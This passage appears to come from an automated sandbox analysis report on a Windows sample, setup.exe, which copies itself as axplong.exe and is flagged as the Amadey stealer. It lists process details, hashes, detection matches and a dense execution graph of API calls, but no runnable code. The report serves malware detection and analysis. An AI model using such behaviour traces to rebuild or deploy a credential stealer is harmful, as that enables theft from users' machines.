                    Date: Fri, 26 Jul 2024 19:04:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:15:01:56
                    Start date:26/07/2024
                    Path:C:\Users\user\Desktop\setup.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\setup.exe"
                    Imagebase:0xc50000
                    File size:1'939'456 bytes
                    MD5 hash:C6620FE2690605F20F5B9C970E8130C6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1247561021.0000000004610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1335650088.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:4
                    Start time:15:02:02
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0xa70000
                    File size:1'939'456 bytes
                    MD5 hash:C6620FE2690605F20F5B9C970E8130C6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000002.1346668514.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.1306286454.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 58%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:13
                    Start time:16:32:00
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0xa70000
                    File size:1'939'456 bytes
                    MD5 hash:C6620FE2690605F20F5B9C970E8130C6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000003.1562495489.0000000004900000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Executed Functions

                      Function 04820C91 Relevance: .1, Instructions: 131COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e51bd287d64107a0318a63c791ad668556498181b2a77d43999ca6a5f7e2ad21
                      • Instruction ID: 57f489244ab9fb5d371cbbf346201085661ed54272fce7085423559ea83c2c6e
                      • Opcode Fuzzy Hash: e51bd287d64107a0318a63c791ad668556498181b2a77d43999ca6a5f7e2ad21
                      • Instruction Fuzzy Hash: 792192EB24D228BE714281416B18AFB6B6EE1D7734731CE26FA07D5502F2992EC97131
                      Function 04820CAB Relevance: .1, Instructions: 127COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14ec3c3f01750cbd6f5401691dcd56f3e9f67374d432eefc81621293089a4f95
                      • Instruction ID: a91e0340b842e20298a2a150740207c27fb353a4eb640acf5e768fbaeadfa94a
                      • Opcode Fuzzy Hash: 14ec3c3f01750cbd6f5401691dcd56f3e9f67374d432eefc81621293089a4f95
                      • Instruction Fuzzy Hash: DF2180EF24E128BE714286416B14AFA6B7EE1C7734330CE26F607D5502F2982AD97131
                      Function 04820CD4 Relevance: .1, Instructions: 105COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7be6a599811367f2a46eff5405e439d20b266b93d5c52eee2fafb983b5900e68
                      • Instruction ID: 863be2dc1a1f3e609eeb10fcfe747abde9760f2f75539f55e1d7bfe33e89b81a
                      • Opcode Fuzzy Hash: 7be6a599811367f2a46eff5405e439d20b266b93d5c52eee2fafb983b5900e68
                      • Instruction Fuzzy Hash: 4011B2EF28E128BE614285416B14AFA6BAEE1D77347308F26F607D5502F2D93AC97131
                      Function 04820D2C Relevance: .1, Instructions: 102COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 85f98aa0a30d3d06a41287113797a657b3909b2994c30f007cfd1e00ceb24bfc
                      • Instruction ID: cadff2ec2c61bc6654269196ca4765bdd38f97833fb86ecd588d33f8636cf11e
                      • Opcode Fuzzy Hash: 85f98aa0a30d3d06a41287113797a657b3909b2994c30f007cfd1e00ceb24bfc
                      • Instruction Fuzzy Hash: 6A11C4EB24E128BE604246416B14AFB6B6EE1D7734730CF26F607D5502F2993EC97131
                      Function 04820CE6 Relevance: .1, Instructions: 100COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 166e38ba7449ee250a3500d6d5d07973eb0b1d22b4bd799dcda77532189297b4
                      • Instruction ID: c6e1888213320d38b8d7f9d66a9d6718308bf2985384321f63f4660f850755ff
                      • Opcode Fuzzy Hash: 166e38ba7449ee250a3500d6d5d07973eb0b1d22b4bd799dcda77532189297b4
                      • Instruction Fuzzy Hash: 3E1123EB28E128BE604286816B14AF76B6EE0C7734330CF26F607C1502F2983AC97031
                      Function 04820D0A Relevance: .1, Instructions: 98COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dfe7bccec8e60eb4aa6e78cff1a1fb31f8886e209277ea19556717cf8c58bf9e
                      • Instruction ID: 67d5d1dc502b2bdec3cde67ee148e3a649a97628a59cff99a2c8df16f6e959f2
                      • Opcode Fuzzy Hash: dfe7bccec8e60eb4aa6e78cff1a1fb31f8886e209277ea19556717cf8c58bf9e
                      • Instruction Fuzzy Hash: DC1104EB28E2287EA14241416B14AF76BAEE1D77343308B22F507D5442F2D53ACA7131
                      Function 04820CFB Relevance: .1, Instructions: 94COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f45dcb73f54ab0af970782c38c95f3601de0dcddeb3b5316b804062a650576f5
                      • Instruction ID: e8612db3813707af0ce3c10b9900efd732dbdd07a88f10b7ba70b417780d1ec8
                      • Opcode Fuzzy Hash: f45dcb73f54ab0af970782c38c95f3601de0dcddeb3b5316b804062a650576f5
                      • Instruction Fuzzy Hash: D21186EB28E128BE614286816B14BF6676EE1D7734330CF26F607D5502F2993AD97131
                      Function 04820D3D Relevance: .1, Instructions: 83COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d9f04b5aa2910343c38b727a8f882469101065fbf0ed460fdb5fafc628aef2b1
                      • Instruction ID: ca1f5fcfe754b04060892a807f7c46617a00f586b9fd30646ad4480ce7dd2ec4
                      • Opcode Fuzzy Hash: d9f04b5aa2910343c38b727a8f882469101065fbf0ed460fdb5fafc628aef2b1
                      • Instruction Fuzzy Hash: BF01B5EB28D128BD614242816B14AF76B7EE5D7734330CB26F907D4502F2992AD97131
                      Function 04820D94 Relevance: .1, Instructions: 54COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12b62000286a1477c34bc0134c13cf46be13f2d241a7a7ad29dd7dedb250a353
                      • Instruction ID: 98f095b303a7190613d695f1d83ad0430dbb42cce37219bf5957d6c9585b1c90
                      • Opcode Fuzzy Hash: 12b62000286a1477c34bc0134c13cf46be13f2d241a7a7ad29dd7dedb250a353
                      • Instruction Fuzzy Hash: D3F082EB38D224BE604281827B14BFB2BADD4E7734331CE27F546D1506F18929C97032
                      Function 04820DA5 Relevance: .1, Instructions: 54COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fa7f0e8d6c2da79341aab77363b2bb91659a6b08a854a80dc3e1b1e198b982ec
                      • Instruction ID: b13b151b5fdcf5673d1827a40b7a33eccb142c6b1194f627843e9ce61100796e
                      • Opcode Fuzzy Hash: fa7f0e8d6c2da79341aab77363b2bb91659a6b08a854a80dc3e1b1e198b982ec
                      • Instruction Fuzzy Hash: 74F0E9FB28D1246F6141818177147FA275ED0E7334330CE27F506C2105E59929DA7132
                      Function 04820DC4 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5341fc7ad9d715a60e8d5540ea8c59c294336299856e7694964f8c2c82d490fd
                      • Instruction ID: 8b1f663067db9f244951afaa7ef0ccdafa75408b012bf05102c317da3a606c23
                      • Opcode Fuzzy Hash: 5341fc7ad9d715a60e8d5540ea8c59c294336299856e7694964f8c2c82d490fd
                      • Instruction Fuzzy Hash: D4E023E728D114AF50424241BB107F72B6DA5A37347308E15F54AD3541F59525C5A032
                      Function 04820E38 Relevance: .0, Instructions: 40COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 62918f22408aafa26ceaf5f6dbf8249c85f541e1583c80cfdb834051528f6955
                      • Instruction ID: f7860b20fdbd3c5ecede56ea77dbbb47221aaf717f41e2cee1b50d7de38afe9c
                      • Opcode Fuzzy Hash: 62918f22408aafa26ceaf5f6dbf8249c85f541e1583c80cfdb834051528f6955
                      • Instruction Fuzzy Hash: 72E0D89B6CE1246D2083418167046F62F6BF4E77343348B22B507C2205B48629C9B030
                      Function 04820DE4 Relevance: .0, Instructions: 34COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04b6c91077dd38cf39478816b2b0abf4679ed491eccf17109f0ab18f8f68eab4
                      • Instruction ID: 057d08724db74568017e6c75ca3027fc0e7cc1a0e4da35a1dbeb6fdee9e8cdc7
                      • Opcode Fuzzy Hash: 04b6c91077dd38cf39478816b2b0abf4679ed491eccf17109f0ab18f8f68eab4
                      • Instruction Fuzzy Hash: 7AE068F798D2686E9382428137156B77BAE99E3330336C477FD05C7102F4820889A1B0

                      Execution Graph

                      Execution Coverage:9.3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:6.2%
                      Total number of Nodes:601
                      Total number of Limit Nodes:41
                      execution_graph 11958 aa6beb 11966 aa6bf7 11958->11966 11960 aa6c26 11961 aa6c43 11960->11961 11962 aa6c35 11960->11962 11978 aa68bd 11961->11978 11963 aa6c99 9 API calls 11962->11963 11965 aa6c3f 11963->11965 11970 aa8aaf 11966->11970 11967 aa6c5d 11969 aa6c71 ___free_lconv_mon 11967->11969 11981 aa6c99 11967->11981 11971 aa8ab4 __cftof 11970->11971 11973 aa8abf 11971->11973 11993 aad4f4 11971->11993 11990 aa651d 11973->11990 11975 aad727 RtlAllocateHeap 11976 aad73a __dosmaperr 11975->11976 11977 aa8af2 __cftof 11975->11977 11976->11960 11977->11975 11977->11976 12012 aa683a 11978->12012 11980 aa68cf 11980->11967 11982 aa6cc4 __cftof 11981->11982 11986 aa6ca7 __cftof __dosmaperr 11981->11986 11983 aa6d06 CreateFileW 11982->11983 11989 aa6cea __cftof __dosmaperr 11982->11989 11984 aa6d2a 11983->11984 11985 aa6d38 11983->11985 12048 aa6e01 GetFileType 11984->12048 12062 aa6d77 11985->12062 11986->11969 11989->11969 12000 aa63f7 11990->12000 11994 aad500 __cftof 11993->11994 11995 aa651d __cftof 2 API calls 11994->11995 11996 aad55c __cftof __dosmaperr 11994->11996 11999 aad6ee __cftof 11995->11999 11996->11973 11997 aad727 RtlAllocateHeap 11998 aad73a __dosmaperr 11997->11998 11997->11999 11998->11973 11999->11997 11999->11998 12002 aa6405 __cftof 12000->12002 12001 aa6450 12001->11977 12002->12001 12005 aa645b 12002->12005 12010 aaa1c2 GetPEB 12005->12010 12007 aa6465 12008 aa646a GetPEB 12007->12008 12009 aa647a __cftof 12007->12009 12008->12009 12011 aaa1dc __cftof 12010->12011 12011->12007 12013 aa685a 12012->12013 12017 aa6851 12012->12017 12013->12017 12018 aab4bb 12013->12018 12017->11980 12019 aab4ce 12018->12019 12021 aa6890 12018->12021 12019->12021 12026 aaf46b 12019->12026 12022 aab4e8 12021->12022 12023 aab4fb 12022->12023 12025 aab510 12022->12025 12023->12025 12031 aae571 12023->12031 12025->12017 12028 aaf477 __cftof 12026->12028 12027 aaf4c6 12027->12021 12028->12027 12029 aa8aaf __cftof 4 API calls 12028->12029 12030 aaf4eb 12029->12030 12032 aae57b 12031->12032 12035 aae489 12032->12035 12034 aae581 12034->12025 12036 aae495 __cftof ___free_lconv_mon 12035->12036 12037 aa8aaf __cftof 4 API calls 12036->12037 12038 aae4b6 12036->12038 12039 aae528 12037->12039 12038->12034 12040 aae564 12039->12040 12044 aaa5ee 12039->12044 12040->12034 12045 aaa611 12044->12045 12046 aa8aaf __cftof 4 API calls 12045->12046 12047 aaa687 12046->12047 12049 aa6e3c 12048->12049 12054 aa6ed2 __dosmaperr 12048->12054 12050 aa6e56 __cftof 12049->12050 12084 aa7177 12049->12084 12052 aa6e75 GetFileInformationByHandle 12050->12052 12050->12054 12053 aa6e8b 12052->12053 12052->12054 12070 aa70c9 12053->12070 12054->11989 12058 aa6ea8 12059 aa6f71 SystemTimeToTzSpecificLocalTime 12058->12059 12060 aa6ebb 12059->12060 12061 aa6f71 SystemTimeToTzSpecificLocalTime 12060->12061 12061->12054 12107 aa7314 12062->12107 12064 aa6d85 12065 aa6d8a __dosmaperr 12064->12065 12066 aa70c9 4 API calls 12064->12066 12065->11989 12067 aa6da3 12066->12067 12068 aa7177 RtlAllocateHeap 12067->12068 12069 aa6dc2 12068->12069 12069->11989 12072 aa70df _wcsrchr 12070->12072 12071 aa6e97 12080 aa6f71 12071->12080 12072->12071 12088 aab9e4 12072->12088 12074 aa7123 12074->12071 12075 aab9e4 4 API calls 12074->12075 12076 aa7134 12075->12076 12076->12071 12077 aab9e4 4 API calls 12076->12077 12078 aa7145 12077->12078 12078->12071 12079 aab9e4 4 API calls 12078->12079 12079->12071 12081 aa6f89 12080->12081 12082 aa6fa9 SystemTimeToTzSpecificLocalTime 12081->12082 12083 aa6f8f 12081->12083 12082->12083 12083->12058 12085 aa7190 12084->12085 12087 aa71a4 __dosmaperr 12085->12087 12099 aab568 12085->12099 12087->12050 12089 aab9f2 12088->12089 12090 aab9f8 __cftof __dosmaperr 12089->12090 12093 aaba2d 12089->12093 12090->12074 12092 aaba28 12092->12074 12094 aaba57 12093->12094 12098 aaba3d __cftof __dosmaperr 12093->12098 12095 aa683a __cftof 4 API calls 12094->12095 12094->12098 12097 aaba81 12095->12097 12096 aab9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12096->12097 12097->12096 12097->12098 12098->12092 12101 aab592 __cftof 12099->12101 12100 aab5ae __dosmaperr ___free_lconv_mon 12100->12087 12101->12100 12103 aad6ef 12101->12103 12106 aad6fc __cftof 12103->12106 12104 aad727 RtlAllocateHeap 12105 aad73a __dosmaperr 12104->12105 12104->12106 12105->12100 12106->12104 12106->12105 12108 aa7338 12107->12108 12110 aa733e 12108->12110 12111 aa7036 12108->12111 12110->12064 12112 aa7042 __dosmaperr 12111->12112 12117 aab87b 12112->12117 12114 aa7068 12114->12110 12115 aa705a __dosmaperr 12115->12114 12116 aab87b RtlAllocateHeap 12115->12116 12116->12114 12120 aab6de 12117->12120 12119 aab894 12119->12115 12121 aab6ee 12120->12121 12123 aab6f5 12121->12123 12124 ab1ef8 12121->12124 12123->12119 12127 ab1d22 12124->12127 12126 ab1f0f 12126->12123 12128 ab1d54 12127->12128 12130 ab1d40 __cftof __dosmaperr 12127->12130 12129 aab568 RtlAllocateHeap 12128->12129 12128->12130 12129->12130 12130->12126 12267 a8b7e9 12274 a8b6e5 12267->12274 12269 a8b836 12286 a8b648 12269->12286 12270 a8b811 Concurrency::details::_Reschedule_chore 12270->12269 12282 a8cade 12270->12282 12273 a8b84e 12275 a8b6f1 Concurrency::details::_Reschedule_chore 12274->12275 12276 a8b722 12275->12276 12296 a8c5dc 12275->12296 12276->12270 12280 a8b70c __Mtx_unlock 12281 a72ad0 10 API calls 12280->12281 12281->12276 12283 a8cafc 12282->12283 12284 a8caec TpCallbackUnloadDllOnCompletion 12282->12284 12283->12269 12284->12283 12287 a8b654 Concurrency::details::_Reschedule_chore 12286->12287 12288 a8c5dc GetSystemTimePreciseAsFileTime 12287->12288 12289 a8b6ae 12287->12289 12290 a8b669 12288->12290 12289->12273 12291 a72ad0 10 API calls 12290->12291 12292 a8b66f __Mtx_unlock 12291->12292 12293 a72ad0 10 API calls 12292->12293 12294 a8b68c __Cnd_broadcast 12293->12294 12294->12289 12295 a72ad0 10 API calls 12294->12295 12295->12289 12304 a8c382 12296->12304 12298 a8b706 12299 a72ad0 12298->12299 12300 a72adc 12299->12300 12301 a72ada 12299->12301 12321 a8c19a 12300->12321 12301->12280 12305 a8c3d8 12304->12305 12307 a8c3aa 12304->12307 12305->12307 12310 a8ce9b 12305->12310 12307->12298 12308 a8c42d __Xtime_diff_to_millis2 12308->12307 12309 a8ce9b _xtime_get GetSystemTimePreciseAsFileTime 12308->12309 12309->12308 12311 a8ceb7 __aulldvrm 12310->12311 12312 a8ceaa 12310->12312 12311->12308 12312->12311 12314 a8ce74 12312->12314 12317 a8cb1a 12314->12317 12318 a8cb2b GetSystemTimePreciseAsFileTime 12317->12318 12319 a8cb37 12317->12319 12318->12319 12319->12311 12322 a8c1c2 12321->12322 12323 a8c1a4 12321->12323 12322->12322 12323->12322 12325 a8c1c7 12323->12325 12328 a72aa0 12325->12328 12327 a8c1de std::_Throw_future_error 12327->12323 12342 a8be0f 12328->12342 12330 a72abf 12330->12327 12331 aa8aaf __cftof 4 API calls 12332 aa6c26 12331->12332 12333 aa6c43 12332->12333 12334 aa6c35 12332->12334 12336 aa68bd 4 API calls 12333->12336 12335 aa6c99 9 API calls 12334->12335 12337 aa6c3f 12335->12337 12339 aa6c5d 12336->12339 12337->12327 12338 a72ab4 12338->12330 12338->12331 12340 aa6c99 9 API calls 12339->12340 12341 aa6c71 ___free_lconv_mon 12339->12341 12340->12341 12341->12327 12345 a8cb61 12342->12345 12346 a8cb6f InitOnceExecuteOnce 12345->12346 12348 a8be22 12345->12348 12346->12348 12348->12338 12131 aad6ef 12134 aad6fc __cftof 12131->12134 12132 aad727 RtlAllocateHeap 12133 aad73a __dosmaperr 12132->12133 12132->12134 12134->12132 12134->12133 12135 a78a60 GetTempPathA 12136 a78abc shared_ptr 12135->12136 12486 a77400 12487 a77435 shared_ptr 12486->12487 12491 a7752f shared_ptr 12487->12491 12492 a8d041 12487->12492 12489 a775bd 12489->12491 12496 a8cff7 12489->12496 12494 a8d052 12492->12494 12493 a8d05a 12493->12489 12494->12493 12500 a8d0c9 12494->12500 12497 a8d007 12496->12497 12498 a8d0af 12497->12498 12499 a8d0ab RtlWakeAllConditionVariable 12497->12499 12498->12491 12499->12491 12501 a8d0d7 SleepConditionVariableCS 12500->12501 12503 a8d0f0 12500->12503 12501->12503 12503->12494 12349 a86ae0 12350 a86b10 12349->12350 12353 a846c0 12350->12353 12352 a86b5c Sleep 12352->12350 12356 a846fb 12353->12356 12370 a84d80 shared_ptr 12353->12370 12354 a84e69 shared_ptr 12354->12352 12357 a7bd60 5 API calls 12356->12357 12356->12370 12368 a84753 shared_ptr __dosmaperr 12357->12368 12358 a84fee shared_ptr 12389 a77d00 12358->12389 12359 a84f25 shared_ptr 12359->12358 12363 a86ab6 12359->12363 12361 a84ffd 12395 a782b0 12361->12395 12364 a846c0 16 API calls 12363->12364 12366 a86b5c Sleep 12364->12366 12365 a84a0d 12367 a7bd60 5 API calls 12365->12367 12365->12370 12366->12363 12371 a84a72 shared_ptr 12367->12371 12368->12365 12369 aa8979 4 API calls 12368->12369 12369->12365 12370->12354 12381 a765b0 12370->12381 12371->12370 12374 a842a0 12371->12374 12373 a85016 shared_ptr 12373->12352 12375 a842e2 12374->12375 12376 a84556 12375->12376 12379 a84308 shared_ptr 12375->12379 12377 a83550 14 API calls 12376->12377 12378 a84520 shared_ptr 12377->12378 12378->12370 12379->12378 12399 a83550 12379->12399 12382 a7660f 12381->12382 12383 a72280 4 API calls 12382->12383 12384 a76699 shared_ptr 12383->12384 12385 a72280 4 API calls 12384->12385 12386 a76822 shared_ptr 12384->12386 12387 a76727 shared_ptr 12385->12387 12386->12359 12387->12386 12388 a72280 4 API calls 12387->12388 12388->12387 12390 a77d66 shared_ptr __cftof 12389->12390 12391 a77ea3 GetNativeSystemInfo 12390->12391 12392 a77ea7 12390->12392 12394 a77eb8 shared_ptr 12390->12394 12391->12392 12392->12394 12474 aa8a81 12392->12474 12394->12361 12396 a78315 shared_ptr __cftof 12395->12396 12397 a78454 GetNativeSystemInfo 12396->12397 12398 a78333 12396->12398 12397->12398 12398->12373 12400 a83ab2 shared_ptr std::_Xinvalid_argument 12399->12400 12401 a8358f shared_ptr 12399->12401 12400->12379 12401->12400 12406 a838f5 shared_ptr __dosmaperr 12401->12406 12410 a7aca0 12401->12410 12402 aa8979 4 API calls 12404 a83a8a 12402->12404 12404->12400 12405 a83e52 12404->12405 12408 a83b9d 12404->12408 12432 a82e20 12405->12432 12406->12400 12406->12402 12415 a81dd0 12408->12415 12412 a7adf0 __cftof 12410->12412 12411 a7ae16 shared_ptr 12411->12406 12412->12411 12447 a75500 12412->12447 12414 a7af7e 12418 a81e6b shared_ptr __dosmaperr 12415->12418 12416 a7e440 6 API calls 12417 a82936 shared_ptr std::_Xinvalid_argument 12416->12417 12417->12400 12418->12417 12419 aa8979 4 API calls 12418->12419 12427 a81e78 12418->12427 12420 a82265 shared_ptr 12419->12420 12420->12417 12421 aa6659 RtlAllocateHeap 12420->12421 12422 a8267a 12421->12422 12423 aa66e7 4 API calls 12422->12423 12422->12427 12424 a8268b shared_ptr __dosmaperr 12423->12424 12424->12417 12425 aa8979 4 API calls 12424->12425 12426 a82759 12425->12426 12426->12417 12426->12427 12428 a827d1 12426->12428 12427->12416 12429 a7e440 6 API calls 12428->12429 12430 a82843 12429->12430 12430->12417 12431 a75df0 2 API calls 12430->12431 12431->12417 12433 a82ec5 __cftof 12432->12433 12434 a832f2 InternetCloseHandle InternetCloseHandle 12433->12434 12435 a83331 12434->12435 12436 a7e440 6 API calls 12435->12436 12437 a83423 shared_ptr 12436->12437 12439 a7aca0 4 API calls 12437->12439 12441 a838f5 shared_ptr __dosmaperr 12437->12441 12444 a8351a shared_ptr std::_Xinvalid_argument 12437->12444 12438 aa8979 4 API calls 12440 a83a8a 12438->12440 12439->12441 12442 a83e52 12440->12442 12440->12444 12445 a83b9d 12440->12445 12441->12438 12441->12444 12443 a82e20 12 API calls 12442->12443 12443->12444 12444->12400 12446 a81dd0 12 API calls 12445->12446 12446->12444 12448 a75520 12447->12448 12448->12448 12450 a75620 12448->12450 12451 a72280 12448->12451 12450->12414 12454 a72240 12451->12454 12455 a72256 12454->12455 12458 aa8667 12455->12458 12461 aa7456 12458->12461 12460 a72264 12460->12448 12462 aa7496 12461->12462 12466 aa747e __cftof __dosmaperr 12461->12466 12463 aa683a __cftof 4 API calls 12462->12463 12462->12466 12464 aa74ae 12463->12464 12467 aa7a11 12464->12467 12466->12460 12469 aa7a22 12467->12469 12468 aa7a31 __cftof __dosmaperr 12468->12466 12469->12468 12470 aa7c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12469->12470 12471 aa7c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12469->12471 12472 aa7d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12469->12472 12473 aa7fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12469->12473 12470->12469 12471->12469 12472->12469 12473->12469 12475 aa86d7 4 API calls 12474->12475 12476 aa8a9f 12475->12476 12476->12394 12504 a88700 12505 a8875a __cftof 12504->12505 12511 a89ae0 12505->12511 12507 a88784 12508 a8879c 12507->12508 12515 a743b0 12507->12515 12510 a88809 std::_Throw_future_error 12512 a89b15 12511->12512 12521 a72ca0 12512->12521 12514 a89b46 12514->12507 12516 a8be0f InitOnceExecuteOnce 12515->12516 12517 a743ca 12516->12517 12518 a743d1 12517->12518 12519 aa6beb 9 API calls 12517->12519 12518->12510 12520 a743e4 12519->12520 12522 a72cdd 12521->12522 12523 a8be0f InitOnceExecuteOnce 12522->12523 12524 a72d06 12523->12524 12525 a72d48 12524->12525 12526 a72d11 12524->12526 12530 a8be27 12524->12530 12537 a72400 12525->12537 12526->12514 12531 a8be33 std::_Throw_future_error 12530->12531 12532 a8be9a 12531->12532 12533 a8bea3 12531->12533 12540 a8bdaf 12532->12540 12534 a72aa0 10 API calls 12533->12534 12536 a8be9f 12534->12536 12536->12525 12558 a8b506 12537->12558 12539 a72432 12541 a8cb61 InitOnceExecuteOnce 12540->12541 12542 a8bdc7 12541->12542 12543 a8bdce 12542->12543 12546 aa6beb 12542->12546 12543->12536 12545 a8bdd7 12545->12536 12554 aa6bf7 12546->12554 12547 aa8aaf __cftof 4 API calls 12548 aa6c26 12547->12548 12549 aa6c43 12548->12549 12550 aa6c35 12548->12550 12552 aa68bd 4 API calls 12549->12552 12551 aa6c99 9 API calls 12550->12551 12553 aa6c3f 12551->12553 12555 aa6c5d 12552->12555 12553->12545 12554->12547 12556 aa6c99 9 API calls 12555->12556 12557 aa6c71 ___free_lconv_mon 12555->12557 12556->12557 